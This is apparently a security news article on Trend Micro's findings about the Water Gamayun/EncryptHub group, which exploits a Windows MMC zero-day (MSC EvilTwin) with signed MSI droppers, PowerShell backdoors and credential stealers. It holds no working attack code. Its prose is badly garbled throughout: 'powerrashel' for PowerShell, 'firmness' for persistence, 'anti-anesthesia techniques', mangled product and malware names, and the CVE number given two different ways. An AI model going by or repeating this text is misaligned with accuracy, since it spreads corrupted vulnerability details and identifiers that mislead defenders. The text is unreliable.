The Microsoft Windows has been found to have two new backdoor actors behind the zero-day exploitation of the recently found security vulnerability. Silentprism And Darkness,
The activity is attributed to a suspected Russian hacking group, called Water Gumayun, also known as NCRPathb and larva -208.
Trend Micro researchers Eliakbar Zahravi and Ahmed Mohammad Ibrahim said in a follow -up analysis published last week, “Danger actor mainly malicious provisioning package, signed .MSI files and Windows MSC files, Intelligent runner for execution, in intelligent runner.
Water Gamayun has been linked to active exploitation of CVE-2025-26633 (aka MSC Eviltwin), which is a vulnerability in the Microsoft Management Console (MMC) framework, which is a vulnerability, which is to execute malware through an evil Microsoft Console (.MSC) file.
The attack chain involves the use of the provisioning package (.PPKG), Microsoft Windows Installer Files (.MSI) are signed, and .MSC files are to steal information and to give backdoor who are capable of stealing firmness and data.
Encrypthub attracted attention to the end of June 2024, through a fake winner website, after using “encrypthub” to push various types of malware families of various types of malware families, including stolen, miners and ransomware. The danger actors have since staged and infected their infrastructure for both command-end-control (C&C) purposes.
.Msi installer used messaging and meeting software used in the attack such as Dingtock, QQTALK and VOOV meetings. They are designed to execute a Powershell downloader, which is then used to bring and run the next phase of payloads on a compromised host.
One such malware is a powerrashel implant dubbed silentPrism that can establish firmness, simultaneously perform several shell commands, and maintain remote control, while anti-inflysis techniques can also include anti-anesthesia techniques. Another powerrashel backdoor of the note is dark, which enables the system reconnaissance, exciting and perseverance of sensitive data.
Researchers said, “Once the malware eliminates reconnaissance and system information for C&C servers, it enters a constant loop,” the researchers said. “Malware Port 8080 accepts the command via a TCP connection, where the command format comes in the command.
“The main communication loop ensures continuous interaction with the loop server, handling the command, maintaining connectivity, and transmitting the results safely.”
The third payload MSC in the attacks is the MSC Eviltwin loader that makes CVE-2025-266633 weapons to execute a malicious. MSC file, eventually leading to the deployment of the stealing of RHADAMANTHYS. The loader is also designed to clean the system to avoid leaving the forensic trail.
Rhadamanthys Water is away from the sole theft in Water Gamayun’s arsenal, as it has been observed that another commodity steeler named Stellak, as well as three custom powerrashel variants, is referred to as Encryptah Staler variant A, variant B, and variant C.
BESPOKE STEALER is a fully fertilizing malware that can collect comprehensive system information including antivirus software, installed software, network adapters and running applications. It also extracts sessions data from various apps related to Wi-Fi password, Windows product keys, clipboard history, browser credentials, and messaging, VPN, FTP and password management.
In addition, it especially makes the files matching some keywords and extensions, which focuses on collecting recovery phrases associated with the cryptocurrency wallet.
Researchers said, “These variants demonstrate equal functionalities and abilities, separating them with only minor amendments,” the researchers said. “All the encryp variants involved in this research are the modified versions of the Open-SOS Cametian Staller.”
A recurrence of the Encrypathb Steelr is notable for the use of a new living-off-aland binary (lolbin) technology, in which Intelligence Process Launcher “Runnerv.xA” is used to proximize the performance of a remote powerrashel script on an infected system.
The artifacts of the theft distributed through malicious MSI package or binary malware droppers have also been found to promote other malware families such as Lumma Staller, Amaide and Clippers.
Further analysis of actor’s C&C Infrastructure (“82.115.223[.]182 “) has used other Powershell scripts to download and execute the enedesk software for remote access and execute the capacity of operators to send the victim machine a 64-incoded remote command.
Trend Micro said, “Water Gamayun used various delivery methods and techniques in its campaign, such as providing malicious payloads through signed Microsoft installer files and taking advantage of lolbins, throws light on their adaptability to compromise the system and data of the victims,” the trend micro said.
“Their complexly designed payloads and C&C infrastructure enable the actor with danger to maintain firmness, control dynamically infected systems and disrupt their activities.”
